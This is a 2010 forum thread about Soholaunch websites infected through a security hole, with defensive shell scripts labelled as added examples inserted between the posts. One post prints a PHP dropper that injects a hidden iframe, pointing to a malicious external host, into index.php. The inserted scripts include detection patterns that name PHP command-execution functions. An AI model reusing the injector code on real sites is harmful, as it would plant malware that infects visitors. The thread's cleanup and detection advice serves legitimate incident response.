"Trojan Horse"

34 replies to this topic

#21 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 22 June 2010 - 08:39 AM

Yep - mine is the only IP address logged... It's a mystery :hmm:
The supreme irony of life is that hardly anyone gets out of it alive. - Robert A. Heinlein
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery

#22 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 22 June 2010 - 03:47 PM

The only thing I could think of is maybe cron a search for the string so you get a timetable of when it changes, and then log-dive to see what's accessing anything during that time. That would at least narrow down the "when" of it happening so that you don't have to eyeball thousands of lines.

(If you have access to the server, ConfigServer Firewall has Directory and file watching capability with reports if a watched directory or a file changes.)

DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
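The "cron a search, then log-dive in that window" idea above, as an added example that is not a script from the thread or from Soholaunch. It assumes the function names, the web-root and log paths, and the constructed sample tree and access-log lines in demo(); the marker string is whatever the injected iframe points at on your site.

```shell
#!/bin/sh
# Added example, not a script from the thread or from Soholaunch: a marker scan
# meant to run from cron so successive runs build a timetable of when the
# injected string appears, plus a helper that pulls the access-log requests
# from that window. Function names, paths and the demo data are assumptions.

# scan_marker ROOT PATTERN LOGFILE
# Appends "<UTC timestamp> HIT <path>" to LOGFILE for every file under ROOT
# that contains PATTERN (a fixed string such as the iframe host). The first
# run in which a path appears bounds when it was modified. Prints this run's
# hit count (grep -c exits 1 when it is zero, which is fine for cron).
scan_marker() {
  root=$1; pattern=$2; out=$3
  stamp=$(date -u '+%Y-%m-%dT%H:%M:%SZ')
  grep -rlF -- "$pattern" "$root" 2>/dev/null | while IFS= read -r f; do
    printf '%s HIT %s\n' "$stamp" "$f"
  done >> "$out"
  grep -c "^$stamp HIT " "$out"
}

# log_hits_in_window ACCESS_LOG PREFIX
# PREFIX is the start of a Common Log Format timestamp: '22/Jun/2010:08' for
# one hour, '22/Jun/2010:08:3' for ten minutes. Prints "count ip method path"
# for the requests in that window, most frequent first, so the handful of
# requests that touched the site at the time stand out from thousands of lines.
log_hits_in_window() {
  grep -F -- "[$2" "$1" | awk '{ gsub(/"/, "", $6); print $1, $6, $7 }' \
    | sort | uniq -c | sort -rn
}

# Demo on a constructed site tree and a constructed access log.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/site/media"
  printf '<body><iframe src="http://malicious.example/go.php"></iframe></body><?php echo 1; ?>' \
    > "$tmp/site/index.php"
  printf '<?php echo 2; ?>' > "$tmp/site/media/index.php"
  cat > "$tmp/access.log" <<'EOF'
10.0.0.5 - - [22/Jun/2010:08:39:01 +0000] "POST /media/photo.php HTTP/1.1" 200 512
10.0.0.9 - - [22/Jun/2010:09:10:00 +0000] "GET / HTTP/1.1" 200 2048
EOF
  echo "hits this run: $(scan_marker "$tmp/site" 'malicious.example' "$tmp/scan.log")"
  cat "$tmp/scan.log"
  log_hits_in_window "$tmp/access.log" '22/Jun/2010:08'
  rm -rf "$tmp"
}
demo
```

To use it for real, replace the demo() call with a scan_marker call on the actual web root and install the script with a crontab entry such as `*/5 * * * * sh /path/to/marker-scan.sh`; the first HIT timestamp for a file, taken together with the FTP client's last-modified time, gives the window to hand to log_hits_in_window.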


#23 kyle04

kyle04

    Senior Member

  • Moderators
  • 411 posts

Posted 22 June 2010 - 10:41 PM

Your ftp client (I use Filezilla) should list the date/time last modified for every file....

#24 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 23 June 2010 - 08:59 AM

Thanks Jen; unfortunately I don't have access to this server. They used to be a hosting client of mine until I gave it all up.... However, I do know the chap who hosts them now pretty well and he's a bit of a Unix guru so maybe I can prevail upon his good nature.. :geek:

Changing the perms on the file doesn't seem to have compromised the site's functionality at all, so maybe I'll ask my man to let me have some of his logs!!

Don't ask, don't get ;)

#25 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 07 July 2010 - 10:28 AM

I don't understand your post: the URL goes to a 404 error and looking at the code, it seems your site is unaffected anyway :confused:

#26 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 16 July 2010 - 09:48 PM

Had another run-in with this little bugger on another site of ours. The site hadn't been updated in a while. This one was putting an iframe up on all the pages and also had a photo.php file in the media folder. The only difference was that this time the PHP file was not encoded. Below is the PHP.

<?$sInjectPHP = "<iframe src=\"http://karatepacan.co.cc/up/go.php?sid=2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"?><?
$iMaxDepth = 4;
$iCurrDepth = 0;

// Starts at the web server's document root
$sDir = $_SERVER['DOCUMENT_ROOT'].'/';
Infect($sDir);

function Infect($sDir)
{
    global $iCurrDepth;
    global $iMaxDepth;
    global $sInjectPHP;
    global $sInjectHTML; // never assigned in this sample
    global $sLog;        // never assigned in this sample

    if(file_exists($sDir) and $hDir = @opendir($sDir))
    {
        while(($sFileName = readdir($hDir)))
        {
            if(is_file($sDir.$sFileName))
            {
                $sExtension = substr($sFileName, strrpos($sFileName, '.')+1);
                switch($sExtension)
                {
                    case 'php':
                        // Prepends the hidden iframe, wrapped in <body>, to the start of index.php
                        if($sFileName == 'index.php')
                        {
                            $sFile = file_get_contents($sDir.$sFileName);
                            $sFile = '<body>'.$sInjectPHP.'</body>'.$sFile;
                            file_put_contents($sDir.$sFileName, $sFile);
                        }
                        break;

                    // Static-page branch, disabled in this sample
                    /*case 'htm':
                    case 'html':
                        chmod($sDir.$sFileName, 666);
                        $sFile = file_get_contents($sDir.$sFileName);
                        $iPos = stripos($sFile, '</body>');
                        if($iPos) $sFile = substr($sFile, 0, $iPos).$sInjectHTML.substr($sFile, $iPos);
                        else $sFile .= $sInjectHTML;
                        file_put_contents($sDir.$sFileName, $sFile);
                        break;*/
                }
            }
            // Recursion into subdirectories (down to $iMaxDepth) is also disabled
            // in this sample, so this copy only touches index.php in the document root
            /*else if (is_dir($sDir.$sFileName) && $sFileName != '.' &&
                $sFileName != '..' && $iCurrDepth <= $iMaxDepth)
            {
                $iCurrDepth++;
                Infect($sDir.$sFileName.'/');
                $iCurrDepth--;
            }*/
        }
        closedir($hDir);
    }
}
?>
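Reversing what the Infect() routine above does, as an added example that is not code from the thread or from Soholaunch. It assumes the function names, a quarantine directory outside the web root, and the constructed tree in demo(); the only fact it relies on from the code above is that the prefix is written at the very start of index.php.

```shell
#!/bin/sh
# Added example, not code from the thread or from Soholaunch: undo what the
# Infect() routine above does to index.php, and list the dropper it comes with
# for a person to inspect. Function names and the demo tree are assumptions.

# The routine writes "<body>" + the hidden iframe + "</body>" at the very start
# of index.php, so the whole prefix is always on line 1.
INJECT_RE='^<body><iframe [^>]*></iframe></body>'

# find_injected ROOT: print each index.php under ROOT that starts with the prefix.
find_injected() {
  find "$1" -type f -name index.php | while IFS= read -r f; do
    if head -n 1 "$f" | grep -q "$INJECT_RE"; then
      printf '%s\n' "$f"
    fi
  done
}

# strip_injected_prefix FILE QDIR: copy FILE into QDIR (keep it outside the
# web root so the iframe can never be served again), then rewrite FILE without
# the prefix; "cat >" keeps the file's owner and mode. Returns 1 and changes
# nothing if the prefix is not there.
strip_injected_prefix() {
  f=$1; qdir=$2
  head -n 1 "$f" | grep -q "$INJECT_RE" || return 1
  cp -p "$f" "$qdir/$(printf '%s' "$f" | tr '/' '_').infected"
  sed "1s|$INJECT_RE||" "$f" > "$f.tmp" && cat "$f.tmp" > "$f" && rm -f "$f.tmp"
}

# clean_tree ROOT QDIR: strip every injected index.php under ROOT, printing
# how many were cleaned. The list goes through a file rather than a pipe so
# the counter survives and paths with spaces are handled.
clean_tree() {
  root=$1; qdir=$2; n=0
  list="$qdir/.injected-list"
  find_injected "$root" > "$list"
  while IFS= read -r f; do
    strip_injected_prefix "$f" "$qdir" && n=$((n + 1))
  done < "$list"
  rm -f "$list"
  echo "$n"
}

# report_droppers ROOT: list any media/photo.php with its size. It is only
# reported, not deleted: one poster's gallery broke after deleting it, so
# compare the file against a clean Soholaunch install before removing it.
report_droppers() {
  find "$1" -type f -path '*/media/photo.php' | while IFS= read -r f; do
    printf '%s %s bytes\n' "$f" "$(wc -c < "$f" | tr -d ' ')"
  done
}

# Demo on a constructed tree: one infected index.php and a stand-in dropper.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/site/media" "$tmp/quarantine"
  printf '<body><iframe src="http://malicious.example/go.php?sid=2" width="0" height="0" frameborder="0"></iframe></body><?php echo "hello"; ?>' \
    > "$tmp/site/index.php"
  printf '<?php /* constructed stand-in, not the real dropper */ ?>' > "$tmp/site/media/photo.php"
  echo "cleaned: $(clean_tree "$tmp/site" "$tmp/quarantine")"
  cat "$tmp/site/index.php"; echo
  report_droppers "$tmp/site"
  rm -rf "$tmp"
}
demo
```

Stripping the prefix only removes the symptom; the dropper that wrote it and whatever hole it came through are still there, which is why the later posts insist on applying the update and changing every password afterwards.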


#27 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 16 July 2010 - 09:51 PM

We had half of the sites on our servers exploited with this (half of the Soholaunch sites). The update from Monday patches the hole, but if you don't have root and your clients don't update, they're likely going to get hit with it. It was pretty widespread.

If you do have a server, contact Soho; they have a patch script you can run to mass-patch all sites without upgrading.



#28 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 18 July 2010 - 08:57 PM

Nice, thanks! Yeah, we have soho on close to 40 accounts on our server

#29 DLecaval

DLecaval

    Newbie

  • Members
  • 2 posts

Posted 20 July 2010 - 12:34 AM

Hi, I had the same problem, but after deleting photo.php the photo gallery won't display photos anymore.
Should there be a photo.php in the media folder or elsewhere? If so, where can I find a clean one?

Tks.

Daniel

#30 Matt Wilcox

Matt Wilcox

    Senior Member

  • Moderators
  • 132 posts

Posted 21 July 2010 - 01:57 PM

Just had another site that was infected. This time I was able to pull one of the files that was in base64 and run it on my Mac. I've run into this before; it's called c99madshell madnet edition, which you can Google and check out for yourself. Basically, it allows whoever is running the PHP file to browse through your directories, view file contents and run Linux commands. I can't stress enough how important it is to look everything over after you run the Soho update and make sure you change all your passwords.
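A triage scan for the traces a base64-packed PHP shell like the one described above leaves in a web root, as an added example that is not from the thread. The patterns, function name and constructed demo files are assumptions; a hit is a lead for a person to inspect, not proof by itself.

```shell
#!/bin/sh
# Added example, not from the thread: a triage scan for the traces that a
# base64-packed PHP shell of the kind described above leaves in a web root, so
# suspects can be pulled for inspection. Patterns, names and demo files are
# assumptions; treat hits as leads, not proof.

# A decoder wrapped in eval(): how a packed shell unpacks and runs itself.
LOADER_RE='eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)[[:space:]]*\('
# Command-execution functions a shell needs in order to run system commands.
EXEC_RE='(shell_exec|passthru|system|popen|proc_open|exec)[[:space:]]*\('
# One unbroken base64 run of 200+ characters: a packed payload, not normal source.
BLOB_RE='[A-Za-z0-9+/=]{200,}'

# scan_indicators ROOT: print "path<TAB>indicators" for every .php file under
# ROOT matching at least one pattern. A file that merely calls base64_decode()
# (say, to embed an image) is not reported; it is the eval() around it that
# matters.
scan_indicators() {
  find "$1" -type f -name '*.php' | while IFS= read -r f; do
    tags=
    grep -Eq "$LOADER_RE" "$f" && tags="${tags}loader,"
    grep -Eq "$EXEC_RE" "$f" && tags="${tags}exec,"
    grep -Eq "$BLOB_RE" "$f" && tags="${tags}blob,"
    if [ -n "$tags" ]; then
      printf '%s\t%s\n' "$f" "${tags%,}"
    fi
  done
}

# Demo on constructed files: a loader stub (the base64 decodes to "hello"),
# a benign decoder call, and a file holding a long opaque blob.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/site/media"
  printf '<?php eval(base64_decode("aGVsbG8=")); ?>' > "$tmp/site/media/photo.php"
  printf '<?php echo base64_decode("aGVsbG8="); ?>' > "$tmp/site/logo.php"
  printf '<?php $p = "%s"; ?>' "$(head -c 250 /dev/zero | tr '\0' 'A')" > "$tmp/site/blob.php"
  scan_indicators "$tmp/site" | sort
  rm -rf "$tmp"
}
demo
```

Run it against a copy of the site rather than on the live tree if you can, and compare every hit against the same file in a clean Soholaunch install: the "exec" tag in particular will also fire on legitimate code, which is why the output is a list to review rather than a list to delete.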

#31 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 21 July 2010 - 06:36 PM

Just want to add an update - I'm starting to get a flood of notices from Google about Soho sites being pegged as Malware sites that have been infected - I've gotten four one after another in the last hour that have been yanked from the search engine.

I would suggest, if folks have not, that they:

Get an account with Google Webmaster Tools (now Google Webmaster Central)
Verify their site
Make sure it has not been picked up yet as malware infected.
Check with your host regarding their malware infection policies - some hosts get Google notices and you are suspended or terminated, so find out before you get caught what your host's policy is.

We'll have a blog post up regarding this issue to our specific customers within an hour or two.



#32 gridstructure

gridstructure

    Newbie

  • Members
  • 3 posts

Posted 25 July 2010 - 09:31 PM

My site built with Soholaunch has also just been infected with malware from klezmoo.co.cc that updates JavaScript even if not requested when entering the site. Google alert coming up, but on the link sent by the host company it went straight in and started downloading. Anyone got any idea how to fix it without closing the site?

#33 DrJon

DrJon

    I was never confused....

  • Moderators
  • 857 posts

Posted 26 July 2010 - 09:37 AM

There's a number of suggestions in this thread.... Have you tried any of them yet?

#34 draknet

draknet

    Senior Member

  • Moderators
  • 828 posts

Posted 26 July 2010 - 08:02 PM

> My site built with Soholaunch has also just been infected with malware from klezmoo.co.cc that updates JavaScript even if not requested when entering the site. Google alert coming up, but on the link sent by the host company it went straight in and started downloading. Anyone got any idea how to fix it without closing the site?


If your site is hacked now and serving malicious software, you need to take that site offline *now* - not when you figure out how to clean it, not in a few days, now. You are potentially infecting your clients and visitors and, if you take credit cards, potentially opening your site up to hefty PCI fines.

The easiest way to take a site offline for a user is to rename public_html, create a new public_html directory, and upload a page explaining that you are offline for maintenance. Then you can reinstall a current version of Soholaunch that doesn't have the hole in it, upload a backup (if you're sure it's clean), and be back in business with a minimum of fuss (making sure to change all the logins).

If you don't have a clean backup (or any backup at all), you have a pretty large problem and may have to rebuild.

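The rename-public_html step described above, as an added example that is not the host's or Soholaunch's own script. It assumes the function name, an account layout with public_html directly under the account's home directory, the quarantine naming, and the maintenance page text.

```shell
#!/bin/sh
# Added example, not the host's or Soholaunch's own script: the take-it-offline
# step described above, done so the hacked tree is kept for comparison with the
# logs but is no longer served. Names and the maintenance text are assumptions.

# take_site_offline ACCOUNT_HOME
# Moves public_html to a timestamped quarantine directory, makes that directory
# owner-only (a web server running as a different user can no longer read it;
# the rename alone already takes it out of the served path), then creates a
# fresh public_html holding nothing but a maintenance page. Prints the
# quarantine path. Returns 1 and changes nothing if there is no public_html.
take_site_offline() {
  home=$1
  [ -d "$home/public_html" ] || return 1
  q="$home/public_html.quarantine-$(date -u +%Y%m%dT%H%M%SZ)"
  mv "$home/public_html" "$q"
  chmod 700 "$q"
  mkdir "$home/public_html"
  cat > "$home/public_html/index.html" <<'EOF'
<!DOCTYPE html>
<html><head><title>Maintenance</title></head>
<body><p>This site is offline for maintenance. Please check back later.</p></body></html>
EOF
  printf '%s\n' "$q"
}

# Demo on a constructed account directory.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/public_html/media"
  printf '<?php echo "old site"; ?>' > "$tmp/public_html/index.php"
  q=$(take_site_offline "$tmp")
  echo "quarantined to: $q"
  ls -la "$tmp/public_html"
  rm -rf "$tmp"
}
demo
```

The quarantined tree is what you hand to the log-diving and scanning steps earlier in the thread; the new public_html is where the current Soholaunch release and a backup you are sure is clean go, after which every login gets changed, exactly as the post above lays out.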


#35 HongMei65

HongMei65

    Soho Novice

  • Members
  • 1 posts

Posted 19 November 2010 - 07:10 AM

This is a good post, I like it very much, I hope that you can create more posts like this. Best wishes.



